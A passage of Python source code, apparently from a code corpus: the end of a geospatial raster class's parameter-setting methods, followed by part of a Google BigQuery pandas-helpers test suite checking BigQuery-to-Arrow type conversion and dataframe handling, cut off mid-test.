self.get_xmax_ymin() new_xsize = len(x) new_dx = None if len(x) == 0: new_dx = np.nan elif len(x) == 1: new_dx = old_dx else: new_dx = (x[1] - x[0]) new_xmin = x[0] if len(x) > 0 else np.nan new_xmax = new_xmin + new_xsize*new_dx if new_xsize != old_xsize: self.set_shape((old_ysize, new_xsize), 'off', set_core) if new_dx != old_dx: self.set_res('dx', new_dx, 'off', set_core) if new_xmin != old_xmin or new_xmax != old_xmax: self.set_extent((new_xmin, old_ymax), (new_xmax, old_ymin), 'off', set_core) self.x = x elif pname == 'y': y = value if value is not None else self.get_y() if type(y) != np.ndarray or not np.issubdtype(y.dtype, np.number) or y.ndim != 1 \ or (len(y) > 1 and np.any(~np.isnan(y)) \ and len(np.unique(np.round((y[1:] - y[:-1]), 8))) > 1): errmsg = "{} must be of type numpy.ndarray with ndim=1 and regular spacing".format(pname) else: if prop: old_ysize, old_xsize = self.get_shape() old_dy = self.get_res('dy') old_xmin, old_ymax = self.get_xmin_ymax() old_xmax, old_ymin = self.get_xmax_ymin() new_ysize = len(y) new_dy = None if len(y) == 0: new_dy = np.nan elif len(y) == 1: new_dy = old_dy else: new_dy = (y[0] - y[1]) new_ymax = y[0] if len(y) > 0 else np.nan new_ymin = new_ymax - new_ysize*new_dy if new_ysize != old_ysize: self.set_shape((new_ysize, old_xsize), 'off', set_core) if new_dy != old_dy: self.set_res('dy', new_dy, 'off', set_core) if new_ymax != old_ymax or new_ymin != old_ymin: self.set_extent((old_xmin, new_ymax), (old_xmax, new_ymin), 'off', set_core) self.y = y elif pname in ('dx', 'dy', 'res'): val = value if value is not None else self.get_res(pname) if prop: if hold is None: hold = 'extent' self.set_res(pname, value, hold) else: if not isinstance(val, numbers.Number) or val < 0 or val == float('inf'): errmsg = "{} must be a positive, finite number".format(pname) else: exec('self.{} = val'.format(pname)) elif pname == "geo_trans": geo_trans = value if value is not None else self.get_geo_trans() if type(geo_trans) != np.ndarray or not np.issubdtype(geo_trans.dtype, np.number) \ or geo_trans.shape != (6,): errmsg = "{} must be a numeric numpy.ndarray with shape (6,)".format(pname) else: if prop: if hold is None: hold = 'extent' old_xmin, old_ymax = self.get_xmin_ymax() old_dx = self.get_res('dx') old_dy = self.get_res('dy') new_xmin, new_ymax = itemgetter(0, 3)(geo_trans) new_dx = geo_trans[1] new_dy = -geo_trans[5] if new_dx != old_dx: self.set_res('dx', new_dx, hold, set_core, skip_gt=True) if new_dy != old_dy: self.set_res('dy', new_dy, hold, set_core, skip_gt=True) if new_xmin != old_xmin or new_ymax != old_ymax: self.set_extent((new_xmin, new_ymax), None, None, set_core, skip_gt=True) self.geo_trans = geo_trans elif pname == 'corner_coords': corner_coords = value if value is not None else self.get_corner_coords() if type(corner_coords) != np.ndarray or not np.issubdtype(corner_coords.dtype, np.number) \ or not corner_coords.shape == (5, 2): errmsg = "{} must be a numeric numpy.ndarray with shape (5, 2)".format(pname) else: if prop: if hold is None: hold = 'res' self.set_extent(corner_coords[0], corner_coords[2], hold, set_core, skip_cc=True) self.corner_coords = corner_coords elif pname == 'proj_ref': proj_ref = value if value is not None else RASTER_DEFAULT_PROJREF if prop: self.set_projection(proj_ref) else: try: spat_ref = osr.SpatialReference(proj_ref) spat_ref.IsProjected() self.proj_ref = proj_ref except: raise InvalidArgumentError("{} must be a WKT projection string that can be" " converted into an osgeo.osr.SpatialReference" " object".format(pname)) elif pname == 'spat_ref': spat_ref = value if value is not None else osr.SpatialReference(RASTER_DEFAULT_PROJREF) try: if type(spat_ref) != osgeo.osr.SpatialReference: raise InvalidArgumentError spat_ref.IsProjected() except: errmsg = "{} must be a projected osgeo.osr.SpatialReference object".format(pname) if errmsg is None: if prop: self.set_projection(spat_ref.ExportToWkt(), set_core, skip_sr=True) self.spat_ref = spat_ref elif pname in ('geom', 'geom_sr'): geom = value if value is not None else self.get_geom() try: if type(geom) != osgeo.ogr.Geometry \ or geom.GetDimension() != 2 or geom.GetCoordinateDimension() != 2: raise InvalidArgumentError wkt = geom.ExportToWkt() if len(wkt.split(',')) != 5: prop = False except: errmsg = "{} must be a 2D osgeo.ogr.Geometry object"\ " containing 5 pairs of 2D coordinates".format(pname) if errmsg is None: if prop: if hold is None: hold = 'res' corner_coords = self.wkt_to_coords(wkt) self.set_extent(corner_coords[0], corner_coords[2], hold, set_core, skip_geom=True) spat_ref = self.geom.GetSpatialReference() if spat_ref is not None: self.set_projection(spat_ref.ExportToWkt(), set_core, skip_geom=True) self.geom = geom else: errmsg = "No setter mechanism has been implemented yet for parameter '{}'".format(pname) if errmsg is not None: if value is not None: raise InvalidArgumentError(errmsg) else: raise RasterIOError(errmsg) def refresh_param(self, pname): if pname not in vars(self).keys(): raise InvalidArgumentError("Raster does not have param `pname` '{}'".format(pname)) exec('self.{} = None'.format(pname)) self.set_param(pname) def prop_param(self, pname, hold=None, set_core=False): if pname not in vars(self).keys(): raise InvalidArgumentError("Raster does not have param `pname` '{}'".format(pname)) value = eval('self.{}'.format(pname)) if value is None: print("No value is stored in this Raster's '{}' parameter to propagate".format(pname)) return exec('self.{} = None'.format(pname)) self.set_param(pname, value, True, hold, set_core, False)
py
1a3f918eb14b3453bf006deb06ca69d28df59e6a
# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import collections import datetime import decimal import functools import operator import queue import warnings import pkg_resources import mock try: import pandas import pandas.api.types import pandas.testing except ImportError: # pragma: NO COVER pandas = None import pyarrow import pyarrow.types try: import geopandas except ImportError: # pragma: NO COVER geopandas = None import pytest from google import api_core from google.cloud import bigquery_storage from google.cloud.bigquery import _helpers from google.cloud.bigquery import schema PANDAS_MINIUM_VERSION = pkg_resources.parse_version("1.0.0") if pandas is not None: PANDAS_INSTALLED_VERSION = pkg_resources.get_distribution("pandas").parsed_version else: # Set to less than MIN version. PANDAS_INSTALLED_VERSION = pkg_resources.parse_version("0.0.0") @pytest.fixture def module_under_test(): from google.cloud.bigquery import _pandas_helpers return _pandas_helpers def is_none(value): return value is None def is_datetime(type_): # See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#datetime-type return all_( pyarrow.types.is_timestamp, lambda type_: type_.unit == "us", lambda type_: type_.tz is None, )(type_) def is_numeric(type_): # See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#numeric-type return all_( pyarrow.types.is_decimal, lambda type_: type_.precision == 38, lambda type_: type_.scale == 9, )(type_) def is_bignumeric(type_): # See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#numeric-type return all_( pyarrow.types.is_decimal, lambda type_: type_.precision == 76, lambda type_: type_.scale == 38, )(type_) def is_timestamp(type_): # See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#timestamp-type return all_( pyarrow.types.is_timestamp, lambda type_: type_.unit == "us", lambda type_: type_.tz == "UTC", )(type_) def do_all(functions, value): return all((func(value) for func in functions)) def all_(*functions): return functools.partial(do_all, functions) def test_is_datetime(): assert is_datetime(pyarrow.timestamp("us", tz=None)) assert not is_datetime(pyarrow.timestamp("ms", tz=None)) assert not is_datetime(pyarrow.timestamp("us", tz="UTC")) assert not is_datetime(pyarrow.timestamp("ns", tz="UTC")) assert not is_datetime(pyarrow.string()) def test_do_all(): assert do_all((lambda _: True, lambda _: True), None) assert not do_all((lambda _: True, lambda _: False), None) assert not do_all((lambda _: False,), None) def test_all_(): assert all_(lambda _: True, lambda _: True)(None) assert not all_(lambda _: True, lambda _: False)(None) @pytest.mark.parametrize( "bq_type,bq_mode,is_correct_type", [ ("STRING", "NULLABLE", pyarrow.types.is_string), ("STRING", None, pyarrow.types.is_string), ("string", "NULLABLE", pyarrow.types.is_string), ("StRiNg", "NULLABLE", pyarrow.types.is_string), ("BYTES", "NULLABLE", pyarrow.types.is_binary), ("INTEGER", "NULLABLE", pyarrow.types.is_int64), ("INT64", "NULLABLE", pyarrow.types.is_int64), ("FLOAT", "NULLABLE", pyarrow.types.is_float64), ("FLOAT64", "NULLABLE", pyarrow.types.is_float64), ("NUMERIC", "NULLABLE", is_numeric), ("BIGNUMERIC", "NULLABLE", is_bignumeric), ("BOOLEAN", "NULLABLE", pyarrow.types.is_boolean), ("BOOL", "NULLABLE", pyarrow.types.is_boolean), ("TIMESTAMP", "NULLABLE", is_timestamp), ("DATE", "NULLABLE", pyarrow.types.is_date32), ("TIME", "NULLABLE", pyarrow.types.is_time64), ("DATETIME", "NULLABLE", is_datetime), ("GEOGRAPHY", "NULLABLE", pyarrow.types.is_string), ("UNKNOWN_TYPE", "NULLABLE", is_none), # Use pyarrow.list_(item_type) for repeated (array) fields. ( "STRING", "REPEATED", all_( pyarrow.types.is_list, lambda type_: pyarrow.types.is_string(type_.value_type), ), ), ( "STRING", "repeated", all_( pyarrow.types.is_list, lambda type_: pyarrow.types.is_string(type_.value_type), ), ), ( "STRING", "RePeAtEd", all_( pyarrow.types.is_list, lambda type_: pyarrow.types.is_string(type_.value_type), ), ), ( "BYTES", "REPEATED", all_( pyarrow.types.is_list, lambda type_: pyarrow.types.is_binary(type_.value_type), ), ), ( "INTEGER", "REPEATED", all_( pyarrow.types.is_list, lambda type_: pyarrow.types.is_int64(type_.value_type), ), ), ( "INT64", "REPEATED", all_( pyarrow.types.is_list, lambda type_: pyarrow.types.is_int64(type_.value_type), ), ), ( "FLOAT", "REPEATED", all_( pyarrow.types.is_list, lambda type_: pyarrow.types.is_float64(type_.value_type), ), ), ( "FLOAT64", "REPEATED", all_( pyarrow.types.is_list, lambda type_: pyarrow.types.is_float64(type_.value_type), ), ), ( "NUMERIC", "REPEATED", all_(pyarrow.types.is_list, lambda type_: is_numeric(type_.value_type)), ), ( "BIGNUMERIC", "REPEATED", all_(pyarrow.types.is_list, lambda type_: is_bignumeric(type_.value_type)), ), ( "BOOLEAN", "REPEATED", all_( pyarrow.types.is_list, lambda type_: pyarrow.types.is_boolean(type_.value_type), ), ), ( "BOOL", "REPEATED", all_( pyarrow.types.is_list, lambda type_: pyarrow.types.is_boolean(type_.value_type), ), ), ( "TIMESTAMP", "REPEATED", all_(pyarrow.types.is_list, lambda type_: is_timestamp(type_.value_type)), ), ( "DATE", "REPEATED", all_( pyarrow.types.is_list, lambda type_: pyarrow.types.is_date32(type_.value_type), ), ), ( "TIME", "REPEATED", all_( pyarrow.types.is_list, lambda type_: pyarrow.types.is_time64(type_.value_type), ), ), ( "DATETIME", "REPEATED", all_(pyarrow.types.is_list, lambda type_: is_datetime(type_.value_type)), ), ( "GEOGRAPHY", "REPEATED", all_( pyarrow.types.is_list, lambda type_: pyarrow.types.is_string(type_.value_type), ), ), ("RECORD", "REPEATED", is_none), ("UNKNOWN_TYPE", "REPEATED", is_none), ], ) def test_bq_to_arrow_data_type(module_under_test, bq_type, bq_mode, is_correct_type): field = schema.SchemaField("ignored_name", bq_type, mode=bq_mode) actual = module_under_test.bq_to_arrow_data_type(field) assert is_correct_type(actual) @pytest.mark.parametrize("bq_type", ["RECORD", "record", "STRUCT", "struct"]) def test_bq_to_arrow_data_type_w_struct(module_under_test, bq_type): fields = ( schema.SchemaField("field01", "STRING"), schema.SchemaField("field02", "BYTES"), schema.SchemaField("field03", "INTEGER"), schema.SchemaField("field04", "INT64"), schema.SchemaField("field05", "FLOAT"), schema.SchemaField("field06", "FLOAT64"), schema.SchemaField("field07", "NUMERIC"), schema.SchemaField("field08", "BIGNUMERIC"), schema.SchemaField("field09", "BOOLEAN"), schema.SchemaField("field10", "BOOL"), schema.SchemaField("field11", "TIMESTAMP"), schema.SchemaField("field12", "DATE"), schema.SchemaField("field13", "TIME"), schema.SchemaField("field14", "DATETIME"), schema.SchemaField("field15", "GEOGRAPHY"), ) field = schema.SchemaField("ignored_name", bq_type, mode="NULLABLE", fields=fields) actual = module_under_test.bq_to_arrow_data_type(field) expected = ( pyarrow.field("field01", pyarrow.string()), pyarrow.field("field02", pyarrow.binary()), pyarrow.field("field03", pyarrow.int64()), pyarrow.field("field04", pyarrow.int64()), pyarrow.field("field05", pyarrow.float64()), pyarrow.field("field06", pyarrow.float64()), pyarrow.field("field07", module_under_test.pyarrow_numeric()), pyarrow.field("field08", module_under_test.pyarrow_bignumeric()), pyarrow.field("field09", pyarrow.bool_()), pyarrow.field("field10", pyarrow.bool_()), pyarrow.field("field11", module_under_test.pyarrow_timestamp()), pyarrow.field("field12", pyarrow.date32()), pyarrow.field("field13", module_under_test.pyarrow_time()), pyarrow.field("field14", module_under_test.pyarrow_datetime()), pyarrow.field("field15", pyarrow.string()), ) expected = pyarrow.struct(expected) assert pyarrow.types.is_struct(actual) assert actual.num_fields == len(fields) assert actual.equals(expected) @pytest.mark.parametrize("bq_type", ["RECORD", "record", "STRUCT", "struct"]) def test_bq_to_arrow_data_type_w_array_struct(module_under_test, bq_type): fields = ( schema.SchemaField("field01", "STRING"), schema.SchemaField("field02", "BYTES"), schema.SchemaField("field03", "INTEGER"), schema.SchemaField("field04", "INT64"), schema.SchemaField("field05", "FLOAT"), schema.SchemaField("field06", "FLOAT64"), schema.SchemaField("field07", "NUMERIC"), schema.SchemaField("field08", "BIGNUMERIC"), schema.SchemaField("field09", "BOOLEAN"), schema.SchemaField("field10", "BOOL"), schema.SchemaField("field11", "TIMESTAMP"), schema.SchemaField("field12", "DATE"), schema.SchemaField("field13", "TIME"), schema.SchemaField("field14", "DATETIME"), schema.SchemaField("field15", "GEOGRAPHY"), ) field = schema.SchemaField("ignored_name", bq_type, mode="REPEATED", fields=fields) actual = module_under_test.bq_to_arrow_data_type(field) expected = ( pyarrow.field("field01", pyarrow.string()), pyarrow.field("field02", pyarrow.binary()), pyarrow.field("field03", pyarrow.int64()), pyarrow.field("field04", pyarrow.int64()), pyarrow.field("field05", pyarrow.float64()), pyarrow.field("field06", pyarrow.float64()), pyarrow.field("field07", module_under_test.pyarrow_numeric()), pyarrow.field("field08", module_under_test.pyarrow_bignumeric()), pyarrow.field("field09", pyarrow.bool_()), pyarrow.field("field10", pyarrow.bool_()), pyarrow.field("field11", module_under_test.pyarrow_timestamp()), pyarrow.field("field12", pyarrow.date32()), pyarrow.field("field13", module_under_test.pyarrow_time()), pyarrow.field("field14", module_under_test.pyarrow_datetime()), pyarrow.field("field15", pyarrow.string()), ) expected_value_type = pyarrow.struct(expected) assert pyarrow.types.is_list(actual) assert pyarrow.types.is_struct(actual.value_type) assert actual.value_type.num_fields == len(fields) assert actual.value_type.equals(expected_value_type) def test_bq_to_arrow_data_type_w_struct_unknown_subfield(module_under_test): fields = ( schema.SchemaField("field1", "STRING"), schema.SchemaField("field2", "INTEGER"), # Don't know what to convert UNKNOWN_TYPE to, let type inference work, # instead. schema.SchemaField("field3", "UNKNOWN_TYPE"), ) field = schema.SchemaField("ignored_name", "RECORD", mode="NULLABLE", fields=fields) with warnings.catch_warnings(record=True) as warned: actual = module_under_test.bq_to_arrow_data_type(field) assert actual is None assert len(warned) == 1 warning = warned[0] assert "field3" in str(warning) @pytest.mark.parametrize( "bq_type,rows", [ ("STRING", ["abc", None, "def", None]), ("BYTES", [b"abc", None, b"def", None]), ("INTEGER", [123, None, 456, None]), ("INT64", [-9223372036854775808, None, 9223372036854775807, 123]), ("FLOAT", [1.25, None, 3.5, None]), ( "NUMERIC", [ decimal.Decimal("-99999999999999999999999999999.999999999"), None, decimal.Decimal("99999999999999999999999999999.999999999"), decimal.Decimal("999.123456789"), ], ), ( "BIGNUMERIC", [ decimal.Decimal("-{d38}.{d38}".format(d38="9" * 38)), None, decimal.Decimal("{d38}.{d38}".format(d38="9" * 38)), decimal.Decimal("3.141592653589793238462643383279"), ], ), ("BOOLEAN", [True, None, False, None]), ("BOOL", [False, None, True, None]), ( "TIMESTAMP", [ datetime.datetime(1, 1, 1, 0, 0, 0, tzinfo=datetime.timezone.utc), None, datetime.datetime( 9999, 12, 31, 23, 59, 59, 999999, tzinfo=datetime.timezone.utc ), datetime.datetime(1970, 1, 1, 0, 0, 0, tzinfo=datetime.timezone.utc), ], ), ( "DATE", [ datetime.date(1, 1, 1), None, datetime.date(9999, 12, 31), datetime.date(1970, 1, 1), ], ), ( "TIME", [ datetime.time(0, 0, 0), None, datetime.time(23, 59, 59, 999999), datetime.time(12, 0, 0), ], ), ( "DATETIME", [ datetime.datetime(1, 1, 1, 0, 0, 0), datetime.datetime(9999, 12, 31, 23, 59, 59, 999999), None, datetime.datetime(1970, 1, 1, 0, 0, 0), datetime.datetime(1999, 3, 14, 15, 9, 26, 535898), ], ), ( "GEOGRAPHY", [ "POINT(30 10)", None, "LINESTRING (30 10, 10 30, 40 40)", "POLYGON ((30 10, 40 40, 20 40, 10 20, 30 10))", ], ), ], ) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_bq_to_arrow_array_w_nullable_scalars(module_under_test, bq_type, rows): series = pandas.Series(rows, dtype="object") bq_field = schema.SchemaField("field_name", bq_type) arrow_array = module_under_test.bq_to_arrow_array(series, bq_field) roundtrip = arrow_array.to_pylist() assert rows == roundtrip @pytest.mark.parametrize( "bq_type,rows", [ ( "TIMESTAMP", [ "1971-09-28T23:59:07+00:00", "1975-04-09T23:59:02+00:00", "1979-08-17T23:59:05+00:00", "NaT", "1983-05-09T13:00:00+00:00", ], ), ( "DATETIME", [ "1971-09-28T23:59:07", "1975-04-09T23:59:02", "1979-08-17T23:59:05", "NaT", "1983-05-09T13:00:00", ], ), ], ) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_bq_to_arrow_array_w_pandas_timestamp(module_under_test, bq_type, rows): rows = [pandas.Timestamp(row) for row in rows] series = pandas.Series(rows) bq_field = schema.SchemaField("field_name", bq_type) arrow_array = module_under_test.bq_to_arrow_array(series, bq_field) roundtrip = arrow_array.to_pandas() assert series.equals(roundtrip) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_bq_to_arrow_array_w_arrays(module_under_test): rows = [[1, 2, 3], [], [4, 5, 6]] series = pandas.Series(rows, dtype="object") bq_field = schema.SchemaField("field_name", "INTEGER", mode="REPEATED") arrow_array = module_under_test.bq_to_arrow_array(series, bq_field) roundtrip = arrow_array.to_pylist() assert rows == roundtrip @pytest.mark.parametrize("bq_type", ["RECORD", "record", "STRUCT", "struct"]) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_bq_to_arrow_array_w_structs(module_under_test, bq_type): rows = [ {"int_col": 123, "string_col": "abc"}, None, {"int_col": 456, "string_col": "def"}, ] series = pandas.Series(rows, dtype="object") bq_field = schema.SchemaField( "field_name", bq_type, fields=( schema.SchemaField("int_col", "INTEGER"), schema.SchemaField("string_col", "STRING"), ), ) arrow_array = module_under_test.bq_to_arrow_array(series, bq_field) roundtrip = arrow_array.to_pylist() assert rows == roundtrip @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_bq_to_arrow_array_w_special_floats(module_under_test): bq_field = schema.SchemaField("field_name", "FLOAT64") rows = [float("-inf"), float("nan"), float("inf"), None] series = pandas.Series(rows, dtype="object") arrow_array = module_under_test.bq_to_arrow_array(series, bq_field) roundtrip = arrow_array.to_pylist() assert len(rows) == len(roundtrip) assert roundtrip[0] == float("-inf") # Since we are converting from pandas, NaN is treated as NULL in pyarrow # due to pandas conventions. # https://arrow.apache.org/docs/python/data.html#none-values-and-nan-handling assert roundtrip[1] is None assert roundtrip[2] == float("inf") assert roundtrip[3] is None @pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`") def test_bq_to_arrow_array_w_geography_dtype(module_under_test): from shapely import wkb, wkt bq_field = schema.SchemaField("field_name", "GEOGRAPHY") series = geopandas.GeoSeries([None, wkt.loads("point(0 0)")]) array = module_under_test.bq_to_arrow_array(series, bq_field) # The result is binary, because we use wkb format assert array.type == pyarrow.binary() assert array.to_pylist() == [None, wkb.dumps(series[1])] # All na: series = geopandas.GeoSeries([None, None]) array = module_under_test.bq_to_arrow_array(series, bq_field) assert array.type == pyarrow.string() assert array.to_pylist() == list(series) @pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`") def test_bq_to_arrow_array_w_geography_type_shapely_data(module_under_test): from shapely import wkb, wkt bq_field = schema.SchemaField("field_name", "GEOGRAPHY") series = pandas.Series([None, wkt.loads("point(0 0)")]) array = module_under_test.bq_to_arrow_array(series, bq_field) # The result is binary, because we use wkb format assert array.type == pyarrow.binary() assert array.to_pylist() == [None, wkb.dumps(series[1])] # All na: series = pandas.Series([None, None]) array = module_under_test.bq_to_arrow_array(series, bq_field) assert array.type == pyarrow.string() assert array.to_pylist() == list(series) @pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`") def test_bq_to_arrow_array_w_geography_type_wkb_data(module_under_test): from shapely import wkb, wkt bq_field = schema.SchemaField("field_name", "GEOGRAPHY") series = pandas.Series([None, wkb.dumps(wkt.loads("point(0 0)"))]) array = module_under_test.bq_to_arrow_array(series, bq_field) # The result is binary, because we use wkb format assert array.type == pyarrow.binary() assert array.to_pylist() == list(series) def test_bq_to_arrow_schema_w_unknown_type(module_under_test): fields = ( schema.SchemaField("field1", "STRING"), schema.SchemaField("field2", "INTEGER"), # Don't know what to convert UNKNOWN_TYPE to, let type inference work, # instead. schema.SchemaField("field3", "UNKNOWN_TYPE"), ) with warnings.catch_warnings(record=True) as warned: actual = module_under_test.bq_to_arrow_schema(fields) assert actual is None assert len(warned) == 1 warning = warned[0] assert "field3" in str(warning) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_get_column_or_index_not_found(module_under_test): dataframe = pandas.DataFrame({"not_the_column_youre_looking_for": [1, 2, 3]}) with pytest.raises(ValueError, match="col_is_missing"): module_under_test.get_column_or_index(dataframe, "col_is_missing") @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_get_column_or_index_with_multiindex_not_found(module_under_test): dataframe = pandas.DataFrame( {"column_name": [1, 2, 3, 4, 5, 6]}, index=pandas.MultiIndex.from_tuples( [("a", 0), ("a", 1), ("b", 0), ("b", 1), ("c", 0), ("c", 1)] ), ) with pytest.raises(ValueError, match="not_in_df"): module_under_test.get_column_or_index(dataframe, "not_in_df") @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_get_column_or_index_with_both_prefers_column(module_under_test): dataframe = pandas.DataFrame( {"some_name": [1, 2, 3]}, index=pandas.Index([0, 1, 2], name="some_name") ) series = module_under_test.get_column_or_index(dataframe, "some_name") expected = pandas.Series([1, 2, 3], name="some_name") pandas.testing.assert_series_equal(series, expected) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_get_column_or_index_with_column(module_under_test): dataframe = pandas.DataFrame({"column_name": [1, 2, 3], "other_column": [4, 5, 6]}) series = module_under_test.get_column_or_index(dataframe, "column_name") expected = pandas.Series([1, 2, 3], name="column_name") pandas.testing.assert_series_equal(series, expected) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_get_column_or_index_with_named_index(module_under_test): dataframe = pandas.DataFrame( {"column_name": [1, 2, 3]}, index=pandas.Index([4, 5, 6], name="index_name") ) series = module_under_test.get_column_or_index(dataframe, "index_name") expected = pandas.Series([4, 5, 6], name="index_name") pandas.testing.assert_series_equal(series, expected) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_get_column_or_index_with_datetimeindex(module_under_test): datetimes = [ datetime.datetime(2000, 1, 2, 3, 4, 5, 101), datetime.datetime(2006, 7, 8, 9, 10, 11, 202), datetime.datetime(2012, 1, 14, 15, 16, 17, 303), ] dataframe = pandas.DataFrame( {"column_name": [1, 2, 3]}, index=pandas.DatetimeIndex(datetimes, name="index_name"), ) series = module_under_test.get_column_or_index(dataframe, "index_name") expected = pandas.Series(datetimes, name="index_name") pandas.testing.assert_series_equal(series, expected) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_get_column_or_index_with_multiindex(module_under_test): dataframe = pandas.DataFrame( {"column_name": [1, 2, 3, 4, 5, 6]}, index=pandas.MultiIndex.from_tuples( [("a", 0), ("a", 1), ("b", 0), ("b", 1), ("c", 0), ("c", 1)], names=["letters", "numbers"], ), ) series = module_under_test.get_column_or_index(dataframe, "letters") expected = pandas.Series(["a", "a", "b", "b", "c", "c"], name="letters") pandas.testing.assert_series_equal(series, expected) series = module_under_test.get_column_or_index(dataframe, "numbers") expected = pandas.Series([0, 1, 0, 1, 0, 1], name="numbers") pandas.testing.assert_series_equal(series, expected) @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_list_columns_and_indexes_without_named_index(module_under_test): df_data = collections.OrderedDict( [ ("a_series", [1, 2, 3, 4]), ("b_series", [0.1, 0.2, 0.3, 0.4]), ("c_series", ["a", "b", "c", "d"]), ] ) dataframe = pandas.DataFrame(df_data) columns_and_indexes = module_under_test.list_columns_and_indexes(dataframe) expected = [ ("a_series", pandas.api.types.pandas_dtype("int64")), ("b_series", pandas.api.types.pandas_dtype("float64")), ("c_series", pandas.api.types.pandas_dtype("object")), ] assert columns_and_indexes == expected @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_list_columns_and_indexes_with_named_index_same_as_column_name( module_under_test, ): df_data = collections.OrderedDict( [ ("a_series", [1, 2, 3, 4]), ("b_series", [0.1, 0.2, 0.3, 0.4]), ("c_series", ["a", "b", "c", "d"]), ] ) dataframe = pandas.DataFrame( df_data, # Use same name as an integer column but a different datatype so that # we can verify that the column is listed but the index isn't. index=pandas.Index([0.1, 0.2, 0.3, 0.4], name="a_series"), ) columns_and_indexes = module_under_test.list_columns_and_indexes(dataframe) expected = [ ("a_series", pandas.api.types.pandas_dtype("int64")), ("b_series", pandas.api.types.pandas_dtype("float64")), ("c_series", pandas.api.types.pandas_dtype("object")), ] assert columns_and_indexes == expected @pytest.mark.skipif( pandas is None or PANDAS_INSTALLED_VERSION < PANDAS_MINIUM_VERSION, reason="Requires `pandas version >= 1.0.0` which introduces pandas.NA", ) def test_dataframe_to_json_generator(module_under_test): utcnow = datetime.datetime.utcnow() df_data = collections.OrderedDict( [ ("a_series", [pandas.NA, 2, 3, 4]), ("b_series", [0.1, float("NaN"), 0.3, 0.4]), ("c_series", ["a", "b", pandas.NA, "d"]), ("d_series", [utcnow, utcnow, utcnow, pandas.NaT]), ("e_series", [True, False, True, None]), ] ) dataframe = pandas.DataFrame( df_data, index=pandas.Index([4, 5, 6, 7], name="a_index") ) dataframe = dataframe.astype({"a_series": pandas.Int64Dtype()}) rows = module_under_test.dataframe_to_json_generator(dataframe) expected = [ {"b_series": 0.1, "c_series": "a", "d_series": utcnow, "e_series": True}, {"a_series": 2, "c_series": "b", "d_series": utcnow, "e_series": False}, {"a_series": 3, "b_series": 0.3, "d_series": utcnow, "e_series": True}, {"a_series": 4, "b_series": 0.4, "c_series": "d"}, ] assert list(rows) == expected def test_dataframe_to_json_generator_repeated_field(module_under_test): pytest.importorskip( "pandas", minversion=str(PANDAS_MINIUM_VERSION), reason=( f"Requires `pandas version >= {PANDAS_MINIUM_VERSION}` " "which introduces pandas.NA" ), ) df_data = [ collections.OrderedDict( [("repeated_col", [pandas.NA, 2, None, 4]), ("not_repeated_col", "first")] ), collections.OrderedDict( [ ("repeated_col", ["a", "b", mock.sentinel.foo, "d"]), ("not_repeated_col", "second"), ] ), ] dataframe = pandas.DataFrame(df_data) rows = module_under_test.dataframe_to_json_generator(dataframe) expected = [ {"repeated_col": [pandas.NA, 2, None, 4], "not_repeated_col": "first"}, { "repeated_col": ["a", "b", mock.sentinel.foo, "d"], "not_repeated_col": "second", }, ] assert list(rows) == expected @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_list_columns_and_indexes_with_named_index(module_under_test): df_data = collections.OrderedDict( [ ("a_series", [1, 2, 3, 4]), ("b_series", [0.1, 0.2, 0.3, 0.4]), ("c_series", ["a", "b", "c", "d"]), ] ) dataframe = pandas.DataFrame( df_data, index=pandas.Index([4, 5, 6, 7], name="a_index") ) columns_and_indexes = module_under_test.list_columns_and_indexes(dataframe) expected = [ ("a_index", pandas.api.types.pandas_dtype("int64")), ("a_series", pandas.api.types.pandas_dtype("int64")), ("b_series", pandas.api.types.pandas_dtype("float64")), ("c_series", pandas.api.types.pandas_dtype("object")), ] assert columns_and_indexes == expected @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_list_columns_and_indexes_with_multiindex(module_under_test): df_data = collections.OrderedDict( [ ("a_series", [1, 2, 3, 4]), ("b_series", [0.1, 0.2, 0.3, 0.4]), ("c_series", ["a", "b", "c", "d"]), ] ) dataframe = pandas.DataFrame( df_data, index=pandas.MultiIndex.from_tuples( [(0, 0, 41), (0, 0, 42), (1, 0, 41), (1, 1, 41)], names=[ "a_index", # Use same name as column, but different dtype so we can verify # the column type is included. "b_series", "c_index", ], ), ) columns_and_indexes = module_under_test.list_columns_and_indexes(dataframe) expected = [ ("a_index", pandas.api.types.pandas_dtype("int64")), ("c_index", pandas.api.types.pandas_dtype("int64")), ("a_series", pandas.api.types.pandas_dtype("int64")), ("b_series", pandas.api.types.pandas_dtype("float64")), ("c_series", pandas.api.types.pandas_dtype("object")), ] assert columns_and_indexes == expected @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") def test_dataframe_to_bq_schema_dict_sequence(module_under_test): df_data = collections.OrderedDict( [ ("str_column", ["hello", "world"]), ("int_column", [42, 8]), ("bool_column", [True, False]), ] ) dataframe = pandas.DataFrame(df_data) dict_schema = [ {"name": "str_column", "type": "STRING", "mode": "NULLABLE"}, {"name": "bool_column", "type": "BOOL", "mode": "REQUIRED"}, ] returned_schema = 